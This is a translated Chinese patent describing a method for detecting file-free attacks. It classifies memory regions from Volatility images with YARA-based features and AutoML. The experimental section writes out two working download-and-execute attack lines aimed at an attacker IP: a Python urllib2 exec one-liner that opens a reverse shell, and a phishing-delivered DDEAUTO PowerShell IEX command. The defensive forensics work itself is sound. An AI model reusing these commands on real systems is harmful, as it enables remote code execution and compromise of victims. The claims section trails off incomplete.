CN117478373A

CN117478373A - File-free attack investigation method and system based on memory evidence obtaining

Info

Publication number: CN117478373A
Application number: CN202311414040.6A
Authority: CN
Inventors: 冷涛
Original assignee: Sichuan Police College
Current assignee: Sichuan Police College
Priority date: 2023-10-30
Filing date: 2023-10-30
Publication date: 2024-01-30

Abstract

The invention provides a file-free attack investigation method and system based on memory evidence obtaining, and belongs to the technical field of network security attack investigation. First, benign samples are run and file-free attacks are carried out separately to obtain memory images. Second, each virtual address descriptor node of each memory image is taken as a sample, and the features of the memory region corresponding to the sample are extracted. The samples are then processed to construct a data set. The data set is divided into a training set and a test set; models are trained on the training set using an automatic machine learning library, an optimal model is selected, and the optimal model is applied to the test set to obtain a test result. Finally, the samples detected as malicious are verified and analyzed according to the test result. The invention detects attacks on specific memory regions in file-free attacks, assists attack investigators, strengthens the security defense capability of the system, protects key data from the threats posed by file-free attacks, and helps ensure stable and secure system operation.

Description

File-free attack investigation method and system based on memory evidence obtaining

Technical Field

The invention belongs to the technical field of network security attack investigation, and particularly relates to a file-free attack investigation method and system based on memory evidence obtaining.

Background

Modern file-free malware uses a variety of techniques to evade detection, and researchers have been exploring memory forensics as a way to detect such attacks. A common approach extracts features with the existing plug-ins of the Volatility memory forensics framework and classifies them with a machine learning algorithm; another approach converts the memory image into a picture representation and detects it with deep learning techniques. However, these methods either take the whole memory image as a sample to determine whether the host has been compromised, or take each process in the memory image as a sample to identify malicious processes. The detection granularity is therefore still relatively coarse, and a specific memory region cannot be located. To address these challenges, further research is needed on fine-grained investigation of file-free attacks, so that malicious processes can be identified and malicious virtual memory regions pinpointed.

Disclosure of Invention

Based on the technical problems, the invention provides a file-free attack investigation method and a file-free attack investigation system based on memory evidence obtaining, which effectively help analysts to investigate file-free malicious software attacks by extracting features and accurately identifying and positioning suspicious memory areas.

The invention provides a file-free attack investigation method based on memory evidence obtaining, which comprises the following steps:

step S1: respectively running benign samples and implementing file-free attacks to obtain memory images; the file-free attack types comprise code injection, script attack and living-off-the-land attack; the memory images comprise malicious-sample memory images and benign-sample memory images;

step S2: taking each virtual address descriptor node of the memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample;

step S3: performing de-duplication operation on the sample, and performing normalization operation on the numerical value of the sample at the same time to construct a data set;

step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set to obtain a test result;

step S5: and according to the test result, performing verification analysis on the tested malicious sample.

Optionally, respectively running benign samples and implementing file-free attacks to obtain memory images specifically includes:

the file-free attack types comprise code injection, script attack and living-off-the-land attack;

the code injection features comprise functions, binaries, code, encryption information, countermeasures, memory, Trojans and attack frameworks;

the script attack features comprise malicious strings, neutral strings and scripts, which are used to detect malicious PowerShell scripts, neutral PowerShell scripts and other malicious scripts, respectively;

the living-off-the-land attack features comprise living-off-the-land binaries (LOLBins), a remote desktop protocol and a darknet communication protocol;

the memory images comprise malicious-sample memory images and benign-sample memory images.

Optionally, taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the feature of the memory area corresponding to the sample specifically includes:

acquiring a feature set of a memory area corresponding to the sample;

and writing a plug-in based on the memory forensics framework to extract the features of the feature set.

Optionally, the performing a deduplication operation on the sample, and simultaneously performing a normalization operation on the numerical value of the sample, so as to construct a data set, which specifically includes:

converting the sample into a set element, removing repeated items, and converting back to the original data type;

the normalization operation formula is:

$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$

wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.

Optionally, the dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result, which specifically includes:

dividing the data set into a training set and a testing set, and randomly distributing the samples;

model training is carried out on the training set by using an automatic machine learning library, evaluation indexes of different models are compared according to output results, and a model with highest precision on the training set is selected as an optimal model;

applying an optimal model to the test set for testing to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;

judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.

The invention also provides a file-free attack investigation system based on memory evidence obtaining, which comprises:

the memory image acquisition module is used for respectively running benign samples and implementing file-free attacks to obtain memory images; the file-free attack types comprise code injection, script attack and living-off-the-land attack; the memory images comprise malicious-sample memory images and benign-sample memory images;

the feature extraction module is used for taking the virtual address descriptor node of each memory mirror image as a sample and extracting the features of the memory area corresponding to the sample;

the data processing module is used for carrying out the de-duplication operation on the sample and carrying out the normalization operation on the numerical value of the sample at the same time to construct a data set;

the automatic machine learning module is used for dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set to obtain a test result;

and the verification analysis module is used for carrying out verification analysis on the tested malicious sample according to the test result.

Optionally, the memory mirror image acquisition module specifically includes:

the living-off-the-land attack features comprise living-off-the-land binaries (LOLBins), a remote desktop protocol and a darknet communication protocol;

Optionally, the feature extraction module specifically includes:

the feature set acquisition sub-module is used for acquiring a feature set of a memory area corresponding to the sample;

and the feature extraction sub-module is used for setting a plug-in based on the memory evidence obtaining frame and extracting the features of the feature set.

Optionally, the data processing module specifically includes:

the deduplication operation submodule is used for converting the sample into a set element, deduplicating repeated items and converting back to the original data type;

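the normalization operation formula is:

$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$

wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.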

Optionally, the automatic machine learning module specifically includes:

a data set dividing submodule for dividing the data set into a training set and a testing set and randomly distributing the samples;

the model training sub-module is used for carrying out model training on the training set by using an automatic machine learning library, comparing evaluation indexes of different models according to output results, and selecting a model with highest precision on the training set as an optimal model;

the model test sub-module is used for applying an optimal model to the test set to test to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;

the model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and retraining and testing; if satisfied, the model is deployed to the actual application.

Compared with the prior art, the invention has the following beneficial effects:

The invention provides a file-free attack investigation system that covers process injection, script-based attacks and living-off-the-land attacks, so its detection value is improved to a certain extent compared with methods that target only memory injection. The virtual address descriptor (memory region) is taken as the sample, so each sample identifies a specific memory region of a specific process; malicious memory regions are identified automatically, which guides attack investigators to analyze the content of those regions further using memory forensics and reduces the analyst's workload. A custom plug-in based on the Volatility memory forensics tool is implemented to extract features from memory images. In addition, multiple types of file-free attacks are carried out to construct a memory image data set.

Drawings

FIG. 1 is a flow chart of a file-free attack investigation method based on memory evidence obtaining in the invention;

FIG. 2 is a block diagram of a file-free attack investigation system based on memory evidence obtaining according to the present invention;

FIG. 3 shows the investigation of a Python-based file-free attack according to the present invention;

FIG. 4 is a schematic diagram of an attack command according to the present invention;

FIG. 5 is a diagram of malicious script content according to the present invention.

Detailed Description

The invention is further described below in connection with specific embodiments and the accompanying drawings, but the invention is not limited to these embodiments.

Example 1

As shown in FIG. 1, the invention discloses a file-free attack investigation method based on memory evidence obtaining, which comprises the following steps:

Step S1: respectively running benign samples and implementing file-free attacks to obtain memory images; the file-free attack types comprise code injection, script attack and living-off-the-land attack; the memory images comprise malicious-sample memory images and benign-sample memory images.

Step S2: and taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of the memory area corresponding to the sample.

Step S3: and carrying out de-duplication operation on the sample, and carrying out normalization operation on the numerical value of the sample at the same time to construct a data set.

Step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set to obtain a test result.

Step S5: performing verification analysis on the samples detected as malicious according to the test result.

The steps are discussed in detail below:

step S1: and respectively running benign samples and implementing file-free attacks to obtain the memory mirror image.

The step S1 specifically comprises the following steps:

The code injection detection features include API (function), binary, code, encryption information, countermeasure, memory and Trojan features, as well as detection of the existing attack frameworks Metasploit and Cobalt Strike.

To detect malicious script attacks, three features are designed: malicious strings, neutral strings and scripts, which are used to detect malicious PowerShell scripts, neutral PowerShell scripts and other types of malicious scripts, respectively. For the malicious document attack vector in file-free attacks, a maldoc (malicious document) feature is developed, and YARA rules are constructed to identify known CVE vulnerabilities and malicious VBA usage in a memory region.

To detect living-off-the-land attacks, a living-off-the-land binaries (LOLBins) feature is designed together with YARA rules that detect whether LOLBins are present in the memory region. In addition, the vnc_dark feature is designed to detect whether VNC (a remote desktop protocol) and darknet protocols are present in the memory region.

The memory images are acquired on the target system by respectively running benign samples and implementing file-free attacks, without triggering any file monitoring or protection mechanism. A memory image is a file that stores all data and state held in system memory at a given moment, and it can be used to analyze the running condition of the system or to restore the system state.

Two types of memory images are acquired: malicious-sample memory images and benign-sample memory images. A malicious-sample memory image is the memory image of a system that has been infected or affected by a file-free attack and may contain traces of malicious code or abnormal behavior. A benign-sample memory image is the memory image of a system that has not been infected or affected by a file-free attack and contains no such traces.

In this embodiment, the file-free attack types include code injection, script attack and living-off-the-land attack; the memory images include malicious-sample memory images and benign-sample memory images.

Following the behavior of real attackers, file-free attacks are simulated on a virtual machine; after an attack is completed, a memory snapshot is captured to obtain the malicious-sample memory image. Benign samples are likewise executed and their memory images captured. Because the trigger conditions of file-free attacks are not fixed, the attacks are executed manually, and the memory image is collected while the attack connection is established. Benign sample execution and memory image acquisition are automated with scripts.

The step S2 specifically comprises the following steps:

A virtual address descriptor (VAD) is a data structure that describes the attributes and state of a memory region in a process's virtual address space. The VAD tree is a balanced binary tree that stores and manages all VAD nodes of a process. Traversing the VAD tree yields information on all memory regions of the process, including the start address, end address, protection attributes, memory type, memory state and mapped file. Each VAD node of each memory image is taken as a sample, and the features of the corresponding memory region are extracted for subsequent machine learning analysis. The extracted features include the following:

basic features including the size of the memory region, protection attributes, memory type, memory state, etc., may reflect the basic attributes and uses of the memory region.

Content characteristics, including strings, binary data, API calls, sensitive information, etc. in the memory region may reflect specific content and functions in the memory region.

Behavior features, including code execution in the memory region, code injection, code modification, code obfuscation, etc., may reflect dynamic behavior and anomalies in the memory region.
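The VAD traversal described above can be illustrated with a minimal Python sketch. The `VadNode` class, its field names and the example addresses are hypothetical simplifications introduced here for illustration; they are not the Windows kernel structures or the plug-in code of the invention.

```python
from dataclasses import dataclass
from typing import Iterator, Optional


@dataclass
class VadNode:
    """Hypothetical, simplified stand-in for one VAD node."""
    start: int                      # first virtual address of the region
    end: int                        # last virtual address of the region
    protection: str                 # e.g. "PAGE_EXECUTE_READWRITE"
    private: bool                   # True if the region is private memory
    left: Optional["VadNode"] = None
    right: Optional["VadNode"] = None


def walk_vad_tree(node: Optional[VadNode]) -> Iterator[VadNode]:
    """Yield every node in ascending address order (in-order traversal)."""
    if node is None:
        return
    yield from walk_vad_tree(node.left)
    yield node
    yield from walk_vad_tree(node.right)


def basic_features(node: VadNode) -> dict:
    """Turn one VAD node into a small dictionary of basic features."""
    return {
        "size": node.end - node.start + 1,
        "protection": node.protection,
        "private": int(node.private),
    }


# Illustrative tree with three regions (addresses chosen for the example).
root = VadNode(
    0x1480000, 0x14BDFFF, "PAGE_EXECUTE_READWRITE", True,
    left=VadNode(0x10000, 0x1FFFF, "PAGE_READWRITE", True),
    right=VadNode(0x7FFE0000, 0x7FFE0FFF, "PAGE_READONLY", False),
)
samples = [basic_features(n) for n in walk_vad_tree(root)]
```

Each element of `samples` corresponds to one VAD node, which mirrors the idea of treating every memory region as a separate sample.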

The method for acquiring the feature set of the memory area corresponding to the sample specifically comprises the following steps:

A memory feature set of the memory region is obtained, comprising eleven features: is_spark, protection, hbcia_structures, tag, mem_map, threads, private, network_structures, persistence, visual_structures and is_map. Of these, is_spark, protection, tag, mem_map, threads, private and is_map are obtained from statistical information or by reading the memory state, while hbcia_structures, network_structures, visual_structures and persistence are obtained by constructing YARA rules to scan the memory region.

A function feature set of the memory region is obtained, comprising three features: api_general_string, api_dynamic_loading and api_mapping, which are implemented by constructing regular expressions or by YARA rule matching.

A binary feature set of the memory region is obtained, comprising seven features: pe_or_dll, is_module, exports, has_header, is_dynamic_library, imports and width_header, which are set by reading specific fields or flags.

A code feature set of the memory region is obtained, comprising five features: direct_calls, direct_jmps, functions, shellcodes and hooks; the first two are matched with regular expressions and the last three with YARA rules.

A countermeasure feature set of the memory region is obtained, comprising three features: debug, sandbox and vm, all of which are matched with YARA rules.

An encryption information feature set of the memory region is obtained, comprising three features: cipher, encoding and mapping, all of which are matched with YARA rules.

A Trojan feature set of the memory region is obtained, comprising two features: cookies and credentials, which are extracted with YARA rules.

A file-free feature set of the memory region is obtained, comprising eight features: msf, cobalt, malstring, neutral, script, lobin, mal_doc and vnc_dark, all of which are matched with YARA rules.
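As a rough illustration of how a few of the features listed above might be computed from the raw bytes of one memory region, consider the following Python sketch. The feature names `has_header`, `api_dynamic_loading` and `script` come from the lists above, but their exact semantics and the patterns used here are assumptions made for this example; the source does not disclose its actual regular expressions or YARA rules, and plain regular expressions are used here in place of YARA.

```python
import re

# Hypothetical patterns, assumed for illustration only.
API_DYNAMIC_LOADING = re.compile(rb"LoadLibrary[AW]?|GetProcAddress")
SCRIPT_HINT = re.compile(rb"powershell|IEX\s*\(", re.IGNORECASE)


def extract_features(region: bytes) -> dict:
    """Compute three illustrative features for one memory region."""
    return {
        # Assumed meaning: region starts with the "MZ" DOS/PE magic bytes.
        "has_header": int(region[:2] == b"MZ"),
        # Assumed meaning: number of dynamic-loading API name strings found.
        "api_dynamic_loading": len(API_DYNAMIC_LOADING.findall(region)),
        # Assumed meaning: 1 if script-like strings occur in the region.
        "script": int(SCRIPT_HINT.search(region) is not None),
    }


pe_like = b"MZ\x90\x00" + b"\x00" * 16 + b"LoadLibraryA\x00GetProcAddress\x00"
script_like = b"powershell IEX (New-Object Net.WebClient)"

pe_features = extract_features(pe_like)
script_features = extract_features(script_like)
```

In practice a forensic plug-in would read each region from the memory image and apply a much larger rule set; the sketch only shows the shape of the per-region feature vector.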

In this embodiment, a memory image captures the data of all processes on the host. The host runs multiple processes, and each process has multiple virtual address descriptors, each describing one memory region (a start and end address). Taking the virtual address descriptor as the sample therefore makes it possible to locate a specific memory region of a specific process.

In this embodiment, the feature design of the memory region is shown in Table 1, with forty-two features in eight categories. The feature sets are the memory feature set, function feature set, binary feature set, code feature set, encryption information feature set, countermeasure feature set, Trojan feature set and file-free feature set.

Table 1. Feature design of memory regions

Writing the plug-in based on the memory forensics framework and extracting the features specifically comprises the following steps:

a custom memory forensics plug-in is written for the open-source Volatility memory forensics tool to extract the features of the feature sets.

The step S3 specifically comprises the following steps:

The samples are converted into set elements, duplicates are removed, and the result is converted back to the original data type.

In this embodiment, a set data structure is used: the samples are converted into set elements, duplicate entries are removed automatically, and the set is then converted back to the original data type. This approach exploits the property that the elements of a set are unordered and cannot repeat, so duplicate samples are dropped as soon as the samples are converted into set elements. The method is simple and easy to use and incurs only modest additional space and time cost.
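The set-based de-duplication described above can be sketched in Python as follows. This is a minimal illustration that assumes each sample is a list of numeric feature values; the function name `deduplicate` is hypothetical.

```python
def deduplicate(samples):
    """Remove duplicate feature vectors using a set, then return lists again."""
    # Lists are not hashable, so each sample is converted to a tuple first.
    unique = set(tuple(sample) for sample in samples)
    # A set is unordered; sorting gives a deterministic result.
    return [list(sample) for sample in sorted(unique)]


raw = [[1, 0, 4096], [1, 0, 4096], [0, 1, 8192]]
clean = deduplicate(raw)
```

Because a set does not preserve insertion order, the sketch sorts the unique samples before converting them back, which keeps the output reproducible.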

The normalization operation formula is:

$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$

wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
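A minimal Python sketch of Min-Max normalization applied to one numeric feature column is given below. The function name and the handling of a constant column (mapping every value to 0.0 to avoid division by zero) are assumptions added for this example; the source does not say how that case is treated.

```python
def min_max_normalize(values):
    """Scale a list of numbers to the range [0, 1] using Min-Max normalization."""
    lowest, highest = min(values), max(values)
    if highest == lowest:
        # Assumption: a constant column carries no information, so map it to 0.0.
        return [0.0 for _ in values]
    return [(value - lowest) / (highest - lowest) for value in values]


region_sizes = [4096, 8192, 12288]
normalized = min_max_normalize(region_sizes)  # [0.0, 0.5, 1.0]
```

Normalizing each numeric feature in this way keeps large-valued features, such as region size, from dominating features that are simple 0/1 flags.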

The step S4 specifically comprises the following steps:

The data set is divided into a training set and a test set, with samples randomly allocated according to a fixed ratio (for example, 80% and 20%) so that both sets are representative and independent of each other.
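The random 80%/20% split can be sketched with the Python standard library alone. The function name, the fixed seed and the toy data below are assumptions made for this illustration; a real pipeline would more likely rely on the splitting utility of its machine learning library.

```python
import random


def train_test_split(samples, labels, test_ratio=0.2, seed=42):
    """Randomly split samples and labels into training and test subsets."""
    indices = list(range(len(samples)))
    random.Random(seed).shuffle(indices)      # seeded for reproducibility
    n_test = int(round(len(indices) * test_ratio))
    test_idx, train_idx = indices[:n_test], indices[n_test:]

    def pick(idx):
        return [samples[i] for i in idx], [labels[i] for i in idx]

    return pick(train_idx), pick(test_idx)


# Toy data: ten one-feature samples with alternating labels.
X = [[i] for i in range(10)]
y = [i % 2 for i in range(10)]
(train_X, train_y), (test_X, test_y) = train_test_split(X, y)
```

Shuffling indices rather than the samples themselves keeps each sample paired with its label.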

Model training is performed on the training set using an automatic machine learning (AutoML) library. AutoML automates the machine learning workflow, including data preprocessing, feature engineering, model selection and hyperparameter optimization. AutoML saves the time and cost of tuning models manually and can improve model performance and interpretability.

An optimal model is selected (in this embodiment, extremely randomized trees): the evaluation metrics of the different models (such as accuracy, recall and F1 score) are compared according to the AutoML output, and the model that performs best on the training set is selected as the optimal model.

The optimal model is applied to the test set: the test set data are used as input to obtain the model's predictions, which are compared with the true labels of the test set to calculate the model's evaluation metrics on the test set, reflecting its generalization ability and stability.

A test result is obtained: whether the model reaches the expected target is judged from the evaluation metrics on the test set. If not, the AutoML parameters or the data set are adjusted and training and testing are repeated; if so, the model can be deployed in practical applications.
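The selection and acceptance logic described above can be sketched independently of any particular AutoML library. In the Python example below, the function names, the leaderboard values and the target thresholds are all hypothetical placeholders chosen for illustration; only the test-set metrics are the figures reported for this embodiment.

```python
def select_best_model(leaderboard, metric="f1"):
    """Return the name of the candidate with the highest value of `metric`."""
    return max(leaderboard, key=lambda name: leaderboard[name][metric])


def meets_target(test_metrics, targets):
    """True if every targeted metric reaches its threshold on the test set."""
    return all(test_metrics[name] >= threshold
               for name, threshold in targets.items())


# Placeholder training-set scores for illustration only (not from the source).
leaderboard = {
    "extra_trees": {"f1": 0.95},
    "random_forest": {"f1": 0.94},
    "logistic_regression": {"f1": 0.80},
}
best = select_best_model(leaderboard)

# Test-set metrics reported for this embodiment; the targets are hypothetical.
test_metrics = {"recall": 0.93, "precision": 0.964, "f1": 0.947}
deploy = meets_target(test_metrics, {"recall": 0.90, "f1": 0.90})
```

If `deploy` were false, the workflow would return to training with adjusted parameters or data, as described in the step above.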

In this embodiment, the experiment on file-free attacks achieved an AUC of 98%, a recall of 93%, a precision of 96.4% and an F1 score of 94.7%.
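As a consistency check on the reported figures, the F1 score is the harmonic mean of precision and recall, and the short Python calculation below recomputes it from the stated precision and recall. The variable names are illustrative.

```python
# Reported test-set values, expressed as fractions.
precision = 0.964
recall = 0.93

# F1 is the harmonic mean of precision and recall.
f1 = 2 * precision * recall / (precision + recall)
f1_percent = round(f1 * 100, 1)
```

The recomputed value rounds to 94.7%, which agrees with the F1 score stated above.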

The step S5 specifically comprises the following steps:

based on the test results, some malicious samples were determined. Further verification of these samples is required to confirm whether they contain malicious code, malicious behavior, or features related to known attack payloads; specialized security tools and memory forensics may be used to analyze the content and structure of the sample.

When Volatility is used, the file path of the memory image and the operating system version (profile) must be specified so that the memory structures are identified correctly. For example, if the memory image file is memory.img and the operating system is Windows 10, the following command can be used:

volatility -f memory.img --profile=Win10x64

Memory forensics is then performed: the malicious memory samples are analyzed and examined in depth using memory forensics techniques. By extracting key information from memory, such as processes, threads, the registry and network connections, the behavior and activity of the malicious samples in the system can be understood and their possible attack payloads identified.

Using Volatility plug-ins, verification analysis can be performed on the malicious memory samples, for example:

the pslist or psscan plug-in can be used to check whether an abnormal or hidden process is running and to record its process ID and name; the netscan plug-in can be used to check whether abnormal or unknown network connections or sockets exist and to record the related processes and remote addresses; the cmdline or dlllist plug-in can be used to check whether abnormal or suspicious command-line parameters or dynamic link libraries exist and to record their paths or contents; the malfind or apihooks plug-in can be used to check whether malicious code has been injected or API hooks exist, and to dump the malicious code to a file for disassembly or decompilation; the hivelist or printkey plug-in can be used to check whether abnormal or modified registry keys exist and to record their values or data; the hashdump plug-in can be used to check whether user account password hashes have been stolen or cracked and to attempt to recover plaintext passwords. The virtual address descriptor (VAD) contents of a process can be dumped to files with the vaddump plug-in, which can also be used to extract data from memory regions that are not mapped to a file, such as heaps, stacks or injected code.

Threat identification and response: according to the results of the verification analysis, the security threats present in the system are identified and a corresponding response strategy is formulated. This may include fixing system vulnerabilities, updating security policies and strengthening network monitoring, so as to improve the security defenses of the system and reduce future security risks.

Example 2

As shown in FIG. 2, the present invention discloses a file-free attack investigation system based on memory evidence obtaining, the system comprising:

the memory image acquisition module 10 is used for respectively running benign samples and implementing file-free attacks to obtain memory images; the file-free attack types comprise code injection, script attack and living-off-the-land attack; the memory images comprise malicious-sample memory images and benign-sample memory images.

The feature extraction module 20 is configured to take the virtual address descriptor node of each memory image as a sample, and extract features of a memory area corresponding to the sample.

The data processing module 30 is configured to perform a deduplication operation on the sample, and perform a normalization operation on the numerical value of the sample, so as to construct a data set.

The automatic machine learning module 40 is configured to divide the data set into a training set and a test set, perform model training on the training set using the automatic machine learning library, select an optimal model, and apply the optimal model to the test set to obtain a test result.

The verification analysis module 50 is configured to perform verification analysis on the tested malicious sample according to the test result.

As an alternative embodiment, the memory mirror image acquisition module 10 of the present invention specifically includes:

The file-free attack types include code injection, script attack and living-off-the-land attack.

Code injection features include functions, binaries, code, encryption information, countermeasures, memory, Trojans and attack frameworks.

The script attack features include malicious strings, neutral strings and scripts, which are used to detect malicious PowerShell scripts, neutral PowerShell scripts and other malicious scripts, respectively.

The living-off-the-land attack features include living-off-the-land binaries (LOLBins), a remote desktop protocol and a darknet communication protocol.

As an alternative embodiment, the feature extraction module 20 of the present invention specifically includes:

the feature set acquisition sub-module is used for acquiring the feature set of the memory area corresponding to the sample.

As an alternative embodiment, the data processing module 30 of the present invention specifically includes:

and the deduplication operation submodule is used for converting the sample into a set element, deduplicating the duplicate item and converting back to the original data type.

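The normalization operation formula is:

$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$

wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.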

As an alternative embodiment, the automatic machine learning module 40 of the present invention specifically includes:

and the data set dividing submodule is used for dividing the data set into a training set and a testing set and randomly distributing samples.

And the model training sub-module is used for carrying out model training on the training set by using the automatic machine learning library, comparing the evaluation indexes of different models according to the output result, and selecting the model with the highest precision on the training set as the optimal model.

And the model test sub-module is used for applying the optimal model to the test set to test, obtaining the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set.

The model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.

Example 3

The present example was analyzed in combination with the experimental content as follows:

The attack process is as follows: on the attacker platform (192.168.233.139), a website is set up using Cobalt Strike, a shell.py script is deployed, and a TCP reverse shell connection is started.

The target machine runs the following script: python -c "import urllib2; exec urllib2.urlopen('http://192.168.233.139:8000/shell.py').read();".

A channel from the attacker to the target machine is established, completing the file-free attack. The system memory image is captured, and the malicious process and malicious memory region are detected. As shown in FIG. 3, each sample contains an "Address" field in the format imagename_processid_processname_vadstartaddress_vadendaddress; for example, the sample named 014.vmem_3488_python.exe_0x1480000_0x14bdfff is detected as malicious. This case involves the memory image "014.vmem", process ID 3488 and process name "python.exe". The memory region of interest corresponds to a virtual address descriptor with start address 0x1480000 and end address 0x14bdfff.
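The sample identifier format described above can be split back into its parts with a short Python sketch, which is convenient when an analyst needs the process ID and address range for a follow-up dump. The `SampleId` type, the function name and the regular expression are assumptions introduced for this example.

```python
import re
from typing import NamedTuple


class SampleId(NamedTuple):
    image: str      # memory image file name
    pid: int        # process ID
    process: str    # process name
    start: int      # VAD start address
    end: int        # VAD end address


# image_pid_process_start_end, with both addresses written in hexadecimal.
_PATTERN = re.compile(
    r"^(?P<image>.+?)_(?P<pid>\d+)_(?P<process>.+)_"
    r"(?P<start>0x[0-9a-fA-F]+)_(?P<end>0x[0-9a-fA-F]+)$"
)


def parse_sample_id(address: str) -> SampleId:
    """Parse an "Address" field into its five components."""
    match = _PATTERN.match(address)
    if match is None:
        raise ValueError(f"unrecognized sample identifier: {address!r}")
    return SampleId(
        image=match["image"],
        pid=int(match["pid"]),
        process=match["process"],
        start=int(match["start"], 16),
        end=int(match["end"], 16),
    )


sample = parse_sample_id("014.vmem_3488_python.exe_0x1480000_0x14bdfff")
```

Applied to the example identifier, the parser yields image "014.vmem", process ID 3488, process name "python.exe" and the region from 0x1480000 to 0x14bdfff.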

The Volatility plugin "vaddump" is used to export the specified memory region. Opening the exported dmp file with Neo then reveals the Cobalt Strike "beacon.dll" (shown in fig. 3), along with information about the functions associated with reverse code injection.
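The manual inspection of the exported region can be complemented by a simple printable-string scan. The sketch below is an assumption-laden illustration rather than the procedure used in the experiment: `ascii_strings` and `match_indicators` are hypothetical helper names, the minimum string length of 6 is arbitrary, and the byte buffer is synthetic data standing in for the contents of a dump file.

```python
import re
from typing import Iterable, List


def ascii_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Return runs of printable ASCII characters at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def match_indicators(strings: Iterable[str], indicators: Iterable[str]) -> List[str]:
    """Return the indicators that occur (case-insensitively) in any string."""
    lowered = [s.lower() for s in strings]
    return [ind for ind in indicators if any(ind.lower() in s for s in lowered)]


# Synthetic buffer for illustration; a real run would read the exported
# dump instead, e.g. data = pathlib.Path(dump_path).read_bytes().
data = b"\x00\x01\x02beacon.dll\x00\xff\xfeabc\x00some other text\x00"

found = ascii_strings(data)
hits = match_indicators(found, ["beacon.dll", "mimikatz"])
print(found, hits)
```

A scan like this only narrows down where to look; confirming that a region really holds an injected module still requires examining the dump itself.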

This embodiment is also analyzed in combination with a case, as follows:

A malicious PowerShell script x1.ps1 is generated on the attacker machine and reverse connection listening is started. An Office document is then constructed with an embedded DDE command: DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.233.146/file_shell/x1.ps1')". The malicious document is sent to the target user by phishing email.

The target user opens the phishing email attachment on the target machine and allows DDE to execute, which establishes a connection channel between the attacker and the target machine and completes the file-free attack. A memory image is then captured, and the applied model detects the following two samples as malicious.

Sample one: 008.vmem_2280_powershell.exe_0x1d30000_0x3d2ffff

Sample two: 008.vmem_2280_powershell.exe_0x1d30000_0x3d2ffff

The two sample names denote memory image 008, the process powershell.exe, and process ID 2280; the malicious memory regions are 0x1d30000_0x3d2ffff and 0x1d30000_0x3d2ffff. The specified memory regions are exported with vaddump and, as shown in figs. 4 and 5, the attack command and the content of the malicious script x1.ps1 are visible. The experimental verification and case analysis thus demonstrate the accuracy and feasibility of the invention.
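When checking an exported region for traces such as the script name, it can help to search in more than one text encoding, since strings held by a .NET-based process such as PowerShell are typically stored as UTF-16LE rather than ASCII. The following sketch assumes exactly that; `find_indicator_offsets` is a hypothetical helper, the match is case-sensitive, and the buffer is synthetic rather than taken from the experiment.

```python
from typing import Dict, List


def find_indicator_offsets(data: bytes, indicator: str) -> Dict[str, List[int]]:
    """Return byte offsets of the indicator for each encoding tried."""
    hits: Dict[str, List[int]] = {}
    for encoding in ("ascii", "utf-16-le"):
        needle = indicator.encode(encoding)
        offsets: List[int] = []
        pos = data.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = data.find(needle, pos + 1)  # continue after this hit
        hits[encoding] = offsets
    return hits


# Synthetic region: one UTF-16LE copy and one ASCII copy of the script name.
region = b"\x00" * 4 + "x1.ps1".encode("utf-16-le") + b"\xff" + b"x1.ps1"

offsets = find_indicator_offsets(region, "x1.ps1")
print(offsets)
```

Adding an offset to the region's start address gives the virtual address of the match inside the process, which makes the finding easy to cross-check in a hex viewer.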

The above describes only the preferred embodiments of the present invention and is not intended to limit it; those skilled in the art may make various modifications and variations to the present invention. Any modification, equivalent replacement, or improvement made within the spirit and principle of the present invention shall fall within its scope of protection.

Claims

1. A file-free attack investigation method based on memory evidence obtaining, characterized by comprising the following steps:

2. The file-free attack investigation method based on memory evidence obtaining according to claim 1, wherein respectively running benign samples and implementing file-free attacks to obtain the memory images specifically comprises:

3. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the extracting the characteristics of the memory area corresponding to the sample by using the virtual address descriptor node of each memory mirror image as the sample specifically comprises:

acquiring a feature set of a memory area corresponding to the sample;

4. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the performing the deduplication operation on the sample and the normalization operation on the numerical value of the sample at the same time, and constructing a data set specifically comprises:

the normalization operation formula is:

